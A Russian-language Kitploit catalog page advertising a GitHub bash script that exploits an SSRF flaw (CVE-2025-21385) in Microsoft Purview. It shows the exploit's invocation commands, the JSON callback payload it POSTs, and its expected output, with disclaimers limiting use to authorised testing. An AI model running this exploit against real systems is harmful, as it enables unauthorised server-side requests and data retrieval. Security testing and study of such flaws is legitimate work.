Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-21385 — Уязвимость SSRF в Microsoft Purview | Kitploit
Инструменты/GitHubGitHub/pauloxc6/cve-2025-21385
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubpauloxc6/cve-2025-21385

CVE-2025-21385

Уязвимость SSRF в Microsoft Purview

Репозиторий
211 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SSRF Exploit Script

Этот репозиторий содержит скрипт, предназначенный для выполнения эксплуатации SSRF (Server-Side Request Forgery) в целях тестирования и обучения. Используйте этот инструмент ответственно и только в средах, где у вас есть явное разрешение.

Возможности

  • Эксплуатация уязвимостей SSRF в целевых системах.
  • Проверка входных URL-адресов для предотвращения неправильного использования.
  • Простой CLI-интерфейс с понятными сообщениями об ошибках и меню помощи.

Требования

  • bash (командная оболочка Unix)
  • jq (обработчик JSON)
  • curl (инструмент командной строки для HTTP-запросов)

Использование

Синтаксис

root@kitploit:~
./script.sh --exploit <target_url> <purview_url>

Параметры

ПараметрОписание
-h, --helpПоказать меню помощи.
--exploit tu puВыполнить SSRF-эксплойт с целевым и purview URL.

Примеры

Показать меню помощи

root@kitploit:~
./script.sh -h

Вывод:

root@kitploit:~
Usage:
./script.sh --exploit <target_url> <purview_url>

Options:
-h, --help       - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs

Выполнение SSRF-эксплойта

root@kitploit:~
./script.sh --exploit http://example.com http://purview-url.com

Ожидаемый вывод:

  • При успехе:
    root@kitploit:~
    SSRF exploit successful! Data retrieved:
    <response data>
    
  • При неудаче:
    root@kitploit:~
    SSRF exploit failed! HTTP code: <code>
    

Порядок работы скрипта

  1. Скрипт разбирает переданные аргументы.
  2. Проверяет корректность предоставленных URL-адресов.
  3. Отправляет HTTP POST-запрос с JSON-нагрузкой на purview_url, пытаясь эксплуатировать уязвимость SSRF.
  4. Выводит HTTP-ответ или сообщение об ошибке в зависимости от результата.

Пример рабочего процесса

Ввод

root@kitploit:~
./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com

Отправляемая нагрузка

root@kitploit:~
{
  "callback": "http://callback-url.com"
}

Обработка ответа

Код HTTP-ответа и тело сохраняются, и на основе кода состояния определяется успех или неудача эксплойта.

Обработка ошибок

  • Если обнаружены недопустимые или отсутствующие аргументы, скрипт предоставляет подробные инструкции через меню помощи.
  • Если URL-адреса указаны некорректно, выводится сообщение об ошибке, и выполнение останавливается.

Заметки для разработчиков

Этот скрипт предназначен только для целей тестирования. Неправильное использование этого скрипта может привести к серьёзным юридическим последствиям. Обеспечьте соблюдение всех применимых законов и этических стандартов.

Вклад в проект

Не стесняйтесь вносить свой вклад, создавая pull request'ы или сообщая о проблемах.

Лицензия

GNU GPL v3


Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение. Автор не несёт ответственности за любое неправильное использование или ущерб, причинённый этим инструментом.

Скачать инструмент